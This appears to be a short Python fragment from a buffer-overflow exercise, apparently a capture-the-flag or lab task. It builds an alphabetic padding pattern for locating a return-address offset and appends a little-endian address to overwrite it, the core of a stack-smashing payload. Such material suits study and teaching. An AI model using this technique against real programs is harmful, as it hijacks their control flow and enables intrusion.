padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
print (padding)
chr(0x51) #prints char that is 0x51 (Q)

padding += "\x24\x84\x04\x08" #0x08 04 84 24 -> Little endian address
